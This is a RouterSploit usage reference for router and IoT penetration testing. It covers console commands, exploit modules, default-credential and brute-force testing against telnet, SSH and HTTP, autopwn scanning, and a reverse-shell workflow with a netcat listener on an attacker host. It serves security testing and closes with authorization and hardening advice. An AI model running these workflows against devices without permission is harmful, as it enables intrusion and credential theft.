RouterSploit

Overview

RouterSploit is an open-source exploitation framework designed for testing embedded devices, routers, and IoT equipment. It provides a modular approach to vulnerability assessment, credential testing, and exploitation of network devices similar to Metasploit but specialized for router and embedded device penetration testing.

Installation

Ubuntu/Debian

git clone https://github.com/threat9/routersploit.git
cd routersploit
pip install -r requirements.txt
python3 rsf.py

macOS

brew install python3
git clone https://github.com/threat9/routersploit.git
cd routersploit
pip3 install -r requirements.txt
python3 rsf.py

Docker

docker run -it threat9/routersploit

From Source

git clone https://github.com/threat9/routersploit.git
cd routersploit
python3 setup.py install
python3 rsf.py

Starting the Interactive Console

python3 rsf.py
# RouterSploit> prompt appears

Basic Commands

Command	Description
`help`	Display all available commands
`show modules`	List all available modules
`search [keyword]`	Search modules by name or description
`use [module]`	Load a specific module
`info`	Display module information and options
`set [option] [value]`	Configure module options
`back`	Exit current module
`show options`	Display current module options
`exploit` or `run`	Execute the current module
`exit`	Exit RouterSploit

Module Types

Exploits

Modules that execute vulnerabilities to gain unauthorized access or control:

use exploits/d-link/dir_815_rce
use exploits/netgear/cmd_injection
use exploits/tp-link/authentication_bypass
use exploits/cisco/arbitrary_file_upload

Credential Testing

Modules for testing default credentials and brute-forcing:

use creds/telnet_bruteforce
use creds/ssh_bruteforce
use creds/http_bruteforce
use creds/default_creds

Scanners

Modules that scan for vulnerabilities without exploitation:

use scanners/autopwn
use scanners/port_scanner
use scanners/service_scanner
use scanners/vulnerability_scanner

Payloads

Modules for generating and delivering payloads:

use payloads/reverse_shell
use payloads/bind_shell

Searching and Listing Modules

Search by Keyword

search d-link
search rce
search authentication
search remote_code_execution

List All Modules

show modules
show modules | grep exploit
show modules | grep creds
show modules | grep scanner

Get Module Details

use exploits/netgear/cmd_injection
info
# Shows: description, options, required fields, vendor info

Working with Exploits

Basic Exploit Workflow

# 1. Search for relevant exploit
search netgear

# 2. Load the module
use exploits/netgear/cmd_injection

# 3. View options
show options
# LHOST (attacker IP), LPORT (listener port), TARGET (target IP)

# 4. Set required options
set target 192.168.1.1
set lhost 192.168.1.100
set lport 4444

# 5. Execute exploit
exploit
# or
run

Setting Target Information

set target 192.168.1.1
set target http://192.168.1.1:8080
set rhost 192.168.1.1  # Remote host

Setting Payload Options

set lhost 192.168.1.100    # Listener/attacker host
set lport 4444              # Listener port
set lpass password123       # Listener password
set payload reverse_shell

Viewing Exploit Requirements

info
# Shows which options are required vs optional
show options

Credential Testing

Default Credential Testing

use creds/default_creds
set target 192.168.1.1
set vendor netgear
exploit

Brute-Force Attack

use creds/telnet_bruteforce
set target 192.168.1.1
set username admin
set wordlist /path/to/passwords.txt
exploit

HTTP Credential Brute-Force

use creds/http_bruteforce
set target 192.168.1.1
set username admin
set wordlist /path/to/wordlist.txt
set threads 4
exploit

SSH Brute-Force

use creds/ssh_bruteforce
set target 192.168.1.1
set port 22
set username root
set wordlist /path/to/passwords.txt
exploit

Scanner Modules

AutoPwn Scanner

Automatically scans for vulnerabilities and attempts exploitation:

use scanners/autopwn
set target 192.168.1.1
exploit
# Scans for known vulnerabilities and exploitation paths

Port Scanner

Identifies open ports on target:

use scanners/port_scanner
set target 192.168.1.1
set ports 1-1000
exploit

Service Detection

Identifies services and versions:

use scanners/service_scanner
set target 192.168.1.1
exploit

Vulnerability Scanner

Scans for known vulnerabilities:

use scanners/vulnerability_scanner
set target 192.168.1.1
set vendor netgear
exploit

Supported Vendors

RouterSploit includes modules for major router and embedded device manufacturers:

Vendor	Common Vulnerabilities
D-Link	Directory traversal, RCE, auth bypass
Netgear	Command injection, authenticated RCE
TP-Link	Authentication bypass, RCE
Cisco	File upload, auth bypass, buffer overflow
Huawei	Authentication bypass, RCE
Ubiquiti	Authentication bypass, RCE
Linksys	Command injection, firmware upload
Belkin	Default credentials, auth bypass
ASUS	Arbitrary file upload, RCE
Mikrotik	Authentication bypass, RCE

Common Workflows

Reconnaissance and Exploitation

# Step 1: Scan target network
use scanners/port_scanner
set target 192.168.1.1
exploit

# Step 2: Identify device and run AutoPwn
use scanners/autopwn
set target 192.168.1.1
exploit

# Step 3: Attempt default credentials
use creds/default_creds
set target 192.168.1.1
exploit

Targeted Exploitation

# Know target device? Search directly
search "TP-Link WR841N"

# Load specific exploit
use exploits/tp-link/wr841n_rce

# Set options
set target 192.168.1.1
set lhost 192.168.1.100

# Execute
exploit

Credential Harvesting

# Multiple credential testing approaches
use creds/default_creds
set target 192.168.1.1
exploit

# Then brute-force remaining services
use creds/telnet_bruteforce
set target 192.168.1.1
exploit

Post-Exploitation Shell Access

# After successful exploit, obtain shell
# Set up listener (in separate terminal)
nc -lvnp 4444

# In RouterSploit, execute reverse shell payload
set payload reverse_shell
set lhost 192.168.1.100
set lport 4444
exploit

# Shell connects to listener

Custom Module Creation

Module Structure

Create custom exploit at routersploit/modules/exploits/custom/:

from routersploit.modules import *

class Exploit(BaseExploit):
    """Custom Router Exploitation Module"""
    
    info = {
        'name': 'Custom Router RCE',
        'description': 'Custom exploitation module description',
        'vendor': 'Custom Vendor',
        'model': 'Custom Model',
        'version': '1.0',
    }
    
    target = Param.ip_addr('Target IP')
    port = Param.port(80, 'Target port')
    
    def check(self):
        """Check if target is vulnerable"""
        # Vulnerability check logic
        pass
    
    def exploit(self):
        """Execute exploit"""
        # Exploitation logic
        pass

RouterSploit vs Metasploit

Feature	RouterSploit	Metasploit
Focus	Routers/IoT	General penetration testing
Learning Curve	Lower	Higher
Module Availability	Router-specific	Extensive (all targets)
Ease of Use	Simpler	More complex
Customization	Good	Excellent
Community	Smaller	Large
Target Scope	Embedded/Router	Broad
Price	Free	Free community version

Advanced Options

Setting Threads for Brute-Force

use creds/http_bruteforce
set threads 10
# Increases concurrent attempts

Custom Wordlists

set wordlist /path/to/custom/passwords.txt
set username_wordlist /path/to/usernames.txt

Timeout Configuration

set timeout 10
# Increases response wait time for slow networks

Logging Output

exploit > output.log
# Capture results to file

Troubleshooting

Issue	Solution
Module not found	Use `search` to find correct module name
Connection refused	Verify target IP and port accessibility
Exploit fails silently	Run `info` to verify all required options set
Slow brute-force	Increase `threads` parameter
Python import errors	Reinstall dependencies: `pip install -r requirements.txt`

Security Considerations

Always obtain written permission before testing
Use on devices you own or have explicit authorization to test
RouterSploit should only be used for authorized security assessments
Document all findings and exploitation attempts
Disable unnecessary services on production routers
Regularly update firmware on network devices
Change default credentials immediately after device setup

Resources

Official GitHub: https://github.com/threat9/routersploit
Module documentation in repository
Vulnerability research databases (CVE, NVD)
Vendor security advisories
IoT security blogs and research papers